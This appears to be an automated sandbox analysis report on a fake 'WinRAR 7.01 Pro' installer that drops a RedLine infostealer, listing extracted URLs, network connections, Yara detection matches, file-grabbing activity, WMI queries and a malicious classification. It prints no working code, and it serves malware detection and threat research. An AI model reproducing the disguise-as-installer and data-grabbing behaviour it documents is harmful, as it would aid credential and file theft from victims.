Source: WinRAR 7.01 Pro.exe, winrar_x64_701ar.exe.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: tmp2175.tmp.dat.3.dr, tmp21B8.tmp.dat.3.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: winrar_x64_701ar.exe, 00000001.00000003.2388750419.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2532236654.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2557756469.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2247129053.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2948327551.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2808837699.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2389356453.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2247591489.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2556818350.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000002.2999504985.000002628B70F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/Vh5j3kI
Source: winrar_x64_701ar.exe, 00000001.00000003.2388750419.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2532236654.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2557756469.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2247129053.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2948327551.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2808837699.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2389356453.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2247591489.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2556818350.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000002.2999504985.000002628B70F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirm
Source: tmp2175.tmp.dat.3.dr, tmp21B8.tmp.dat.3.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: tmp2175.tmp.dat.3.dr, tmp21B8.tmp.dat.3.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: tmp2175.tmp.dat.3.dr, tmp21B8.tmp.dat.3.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: tmp2175.tmp.dat.3.dr, tmp21B8.tmp.dat.3.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: tmp2175.tmp.dat.3.dr, tmp21B8.tmp.dat.3.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: tmp2175.tmp.dat.3.dr, tmp21B8.tmp.dat.3.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: tmp22D7.tmp.dat.3.dr	String found in binary or memory: https://support.mozilla.org
Source: tmp22D7.tmp.dat.3.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: tmp22D7.tmp.dat.3.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: History.txt.3.dr, tmp21A7.tmp.dat.3.dr, tmp2197.tmp.dat.3.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: tmp21A7.tmp.dat.3.dr, tmp2197.tmp.dat.3.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: History.txt.3.dr, tmp21A7.tmp.dat.3.dr, tmp2197.tmp.dat.3.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: tmp21A7.tmp.dat.3.dr, tmp2197.tmp.dat.3.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: tmp2175.tmp.dat.3.dr, tmp21B8.tmp.dat.3.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: tmp2175.tmp.dat.3.dr, tmp21B8.tmp.dat.3.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: tmp22D7.tmp.dat.3.dr	String found in binary or memory: https://www.mozilla.org
Source: tmp22D7.tmp.dat.3.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: tmp22D7.tmp.dat.3.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: History.txt0.3.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/)
Source: places.raw.3.dr, tmp22D7.tmp.dat.3.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: tmp22D7.tmp.dat.3.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: places.raw.3.dr, tmp22D7.tmp.dat.3.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 104.21.44.66:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49743 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	File deleted: C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Desktop\WUTJSCBCFX.jpg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	File deleted: C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Desktop\DVWHKMNFNN\DVWHKMNFNN.docx	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	File deleted: C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Desktop\LTKMYBSEYZ\ZBEDCJPBEY.jpg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	File deleted: C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Desktop\YPSIACHYXW.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	File deleted: C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Desktop\DVWHKMNFNN\LTKMYBSEYZ.xlsx	Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: WinRAR 7.01 Pro.exe, type: SAMPLE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 3.0._microsoft_corporation.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.WinRAR 7.01 Pro.exe.3b4c9f8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.WinRAR 7.01 Pro.exe.3785570.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.0.WinRAR 7.01 Pro.exe.52173.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.0.WinRAR 7.01 Pro.exe.50000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe, type: DROPPED	Matched rule: Detects RedLine infostealer Author: ditekSHen

Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe

Code function: 1_2_00007FF6C3BB0A20 SetWindowLongPtrW,NtdllDefWindowProc_W,NtdllDefWindowProc_W,

1_2_00007FF6C3BB0A20

Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe

Code function: 1_2_00007FF6C3B9C4E0: CreateFileW,CloseHandle,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

1_2_00007FF6C3B9C4E0

Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Code function: 1_2_00007FF6C3B95330	1_2_00007FF6C3B95330
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Code function: 1_2_00007FF6C3BB41D0	1_2_00007FF6C3BB41D0
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Code function: 1_2_00007FF6C3BB4930	1_2_00007FF6C3BB4930
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Code function: 1_2_00007FF6C3BA5B4C	1_2_00007FF6C3BA5B4C
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Code function: 1_2_00007FF6C3BB5ABC	1_2_00007FF6C3BB5ABC
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Code function: 1_2_00007FF6C3BA6960	1_2_00007FF6C3BA6960
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Code function: 1_2_00007FF6C3BD1518	1_2_00007FF6C3BD1518
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Code function: 1_2_00007FF6C3BA94DC	1_2_00007FF6C3BA94DC
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Code function: 1_2_00007FF6C3BAD3C0	1_2_00007FF6C3BAD3C0
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Code function: 1_2_00007FF6C3BC83C0	1_2_00007FF6C3BC83C0
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Code function: 1_2_00007FF6C3BC1370	1_2_00007FF6C3BC1370
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Code function: 1_2_00007FF6C3BC31D0	1_2_00007FF6C3BC31D0
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Code function: 1_2_00007FF6C3B9A1EC	1_2_00007FF6C3B9A1EC
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Code function: 1_2_00007FF6C3BC78AC	1_2_00007FF6C3BC78AC
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Code function: 1_2_00007FF6C3BC2840	1_2_00007FF6C3BC2840
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Code function: 1_2_00007FF6C3BC1780	1_2_00007FF6C3BC1780
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Code function: 1_2_00007FF6C3B94778	1_2_00007FF6C3B94778
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Code function: 1_2_00007FF6C3B97754	1_2_00007FF6C3B97754
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Code function: 1_2_00007FF6C3BC65C0	1_2_00007FF6C3BC65C0
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Code function: 1_2_00007FF6C3BC35D4	1_2_00007FF6C3BC35D4
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Code function: 1_2_00007FF6C3BC1574	1_2_00007FF6C3BC1574
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Code function: 1_2_00007FF6C3BB1CE8	1_2_00007FF6C3BB1CE8
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Code function: 1_2_00007FF6C3B98BE0	1_2_00007FF6C3B98BE0
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Code function: 1_2_00007FF6C3BC1B90	1_2_00007FF6C3BC1B90
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Code function: 1_2_00007FF6C3BC9B40	1_2_00007FF6C3BC9B40
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Code function: 1_2_00007FF6C3BCCB10	1_2_00007FF6C3BCCB10
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Code function: 1_2_00007FF6C3BC1984	1_2_00007FF6C3BC1984
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Code function: 1_2_00007FF6C3BA8978	1_2_00007FF6C3BA8978
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Code function: 1_2_00007FF6C3BAF9B0	1_2_00007FF6C3BAF9B0
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Code function: 1_2_00007FF6C3BAF04C	1_2_00007FF6C3BAF04C
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Code function: 1_2_00007FF6C3BA7FC8	1_2_00007FF6C3BA7FC8
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Code function: 1_2_00007FF6C3BCCFAC	1_2_00007FF6C3BCCFAC
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Code function: 1_2_00007FF6C3BAEEF0	1_2_00007FF6C3BAEEF0
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Code function: 1_2_00007FF6C3B9DE98	1_2_00007FF6C3B9DE98
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Code function: 1_2_00007FF6C3BC1D94	1_2_00007FF6C3BC1D94
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Code function: 1_2_00007FF6C3BC7D40	1_2_00007FF6C3BC7D40

Source: _microsoft_corporation.exe.0.dr

Static PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"

Source: WinRAR 7.01 Pro.exe, 00000000.00000002.1784885207.00000000009AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs WinRAR 7.01 Pro.exe
Source: WinRAR 7.01 Pro.exe	Binary or memory string: OriginalFilenameWindowsApplication1.exeH vs WinRAR 7.01 Pro.exe
Source: WinRAR 7.01 Pro.exe	Binary or memory string: OriginalFilenameWinRAR.exeD vs WinRAR 7.01 Pro.exe

Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: WinRAR 7.01 Pro.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: WinRAR 7.01 Pro.exe, type: SAMPLE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 3.0._microsoft_corporation.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.WinRAR 7.01 Pro.exe.3b4c9f8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.WinRAR 7.01 Pro.exe.3785570.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.0.WinRAR 7.01 Pro.exe.52173.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.0.WinRAR 7.01 Pro.exe.50000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe, type: DROPPED	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073

Source: _microsoft_corporation.exe.0.dr

Static PE information: Section: .rsrc ZLIB complexity 0.9947721910612536

Source: 3.3._microsoft_corporation.exe.26bbf08.0.raw.unpack, pteXN7SPQvYX16605Cl.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.3._microsoft_corporation.exe.26bbf08.0.raw.unpack, pteXN7SPQvYX16605Cl.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.3._microsoft_corporation.exe.26bbf08.0.raw.unpack, pteXN7SPQvYX16605Cl.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.3._microsoft_corporation.exe.26bbf08.0.raw.unpack, pteXN7SPQvYX16605Cl.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winEXE@21/94@4/4

Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe

Code function: 1_2_00007FF6C3B9BA38 GetLastError,FormatMessageW,LocalFree,

1_2_00007FF6C3B9BA38

Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe

Code function: 1_2_00007FF6C3BB1FEC FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GlobalUnlock,GlobalFree,

1_2_00007FF6C3BB1FEC

Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\WinRAR 7.01 Pro.exe.log

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8028:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Mutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2160:120:WilError_03

Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe

File created: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe

Jump to behavior

Source: WinRAR 7.01 Pro.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: WinRAR 7.01 Pro.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.69%

Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
